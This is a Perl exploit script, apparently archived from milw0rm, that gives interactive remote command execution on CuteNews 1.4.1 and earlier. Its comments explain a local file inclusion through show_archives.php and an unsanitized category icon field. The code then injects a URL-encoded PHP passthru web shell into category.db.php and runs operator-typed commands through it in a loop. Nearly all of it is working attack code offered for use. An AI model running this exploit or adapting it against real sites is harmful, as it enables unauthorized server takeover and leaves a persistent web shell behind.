#!/usr/bin/perl
#
# cijfer-cnxpl - CuteNews <=1.4.1 Remote Command Execution
#
# Copyright (c) 2005 cijfer <cijfer@netti.fi>
# All rights reserved.           
#
## 1. example
#
# [cijfer@kalma:/research]$ ./cijfer-cnxpl.pl -h www.xxxx.org -d /news
# [cijfer@www.xxxx.org /]$ id;uname -a
# uid=48(apache) gid=48(apache) groups=48(apache),29000(web_serving) context=root:system_r:httpd_sys_script_t
# Linux server.xxxx.org 2.6.13-1.1532_FC4 #1 Thu Oct 20 01:30:08 EDT 2005 i686 i686 i386 GNU/Linux
# [cijfer@www.xxxx.org /]$
#
## 2. explanation
#
# this particular vulnerability is already known (sort of). a
# bug as exact as this one was found by rgod in CuteNews. the
# sole difference between his and my bug, are the files that
# are being exploited. while his was a bug using the following
# string:
#
#	show_archives.php?template=../inc/ipban.mdu%00
#
# i found my bug in:
#
#	show_archives.php?template=../inc/categories.mdu%00
#
## 3. the bug
#
# the bug lies in categories.mdu, located in the /inc/ folder
# of the cutenews directory.
#
# by using the 'template' variable in show_archives.php, we
# can include any local files. in this case, we're including
# categories.mdu. why? every .mdu file within the cutenews 
# package has raw PHP code within it, that is not protected
# like the normal .php files.
#
# $template gets sanitized, but can be bypassed depending on
# php configuration! this is why on some 1.4.0's it works and
# on some others it does not. it all depends on configuration
# and whether or not register_globals needs to be on.
#
# 	if(file_exists("$cutepath/data/${template}.tpl")){ require("$cutepath/data/${template}.tpl"); }
#       ...
#
# looking into categories.mdu, we notice the following to
# create our exploit string:
#
# 	if($member_db[1] != 1){ msg("error", "Access Denied", "You don't have permission to edit categories"); }
#       ... 
#
#	elseif($action == "doedit")
# 	{
#       ...
#
# cannot write arbitrary php code to $cat_name :(
#
#	$cat_name = htmlspecialchars(stripslashes($cat_name)); 
#       ...
#
# $cat_icon lacks sanitization :))!
#
#	fwrite($new_cats, "$catid|$cat_name|$cat_icon|||\n");
#       ...
#
# adding together all these elements, it is possible to inject
# php code into data/category.db.php and from there, use our
# injected code to either include a remote php shell, or run
# commands on the system.
#
##
#
# $Id: cijfer-cnxpl.pl,v 0.2 2005/12/26 03:36:00 cijfer Exp cijfer $

use IO::Socket;
use Getopt::Std;
use URI::Escape;

getopts("h:d:");

$host = $opt_h;
$dirs = $opt_d;
$good = 0;

if(!$host)
{
	print "cijfer-cnxpl.pl by cijfer\n";
        print "usage: $0 -h <hostname> -d [/directory]\r\n";
        exit();
}

while()
{
	print "[cijfer@".$host." /]\$ ";
	while(<STDIN>)
	{
		$cmds=$_;
		chomp($cmds);
		last;
	}

if(!$dirs)
{
	$dirs = "/cutenews";
}

$string  = $dirs;
$string .= "/show_archives.php?template=../inc/categories.mdu%00";
$string .= "&member_db[1]=1";
$string .= "&action=doedit";                                #can be changed from 'doedit' to 'add' if no categories exist
$string .= "&cat_name=cijfer";
$string .= "&catid=1";                                      #can be changed to different value if starting catid != 0
$string .= "&cat_icon=%3C%3Fpassthru%28%24_GET%5Bcij%5D%29%3Bdie%28%29%3B%3F%3E";

$cijfer  = $dirs;
$cijfer .= "/data/category.db.php?cij=";
$cijfer .= uri_escape("echo; ");
$cijfer .= "%20%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20"; # _START_
$cijfer .= uri_escape($cmds);
$cijfer .= "%3B%20%65%63%68%6F%20%5F%45%4E%44%5F";          # _END_

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";

print $sock "GET $string HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "Connection: close\n\n";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $host, PeerPort => 80) || die "error: connect()\n";

print $sock "GET $cijfer HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: */*\n";
print $sock "Connection: close\n\n";

while($result = <$sock>)
{
	if($sock =~ /^403/)
	{
		print "error: 403\n";
		exit();
	}
	if($result =~ /^_END_/)
	{
		$good=0;
	}

	if($good==1)
	{
        	print $result;
	}

	if($result =~ /^_START_/)
	{
		$good=1;
	}
}
}

# milw0rm.com [2006-01-01]
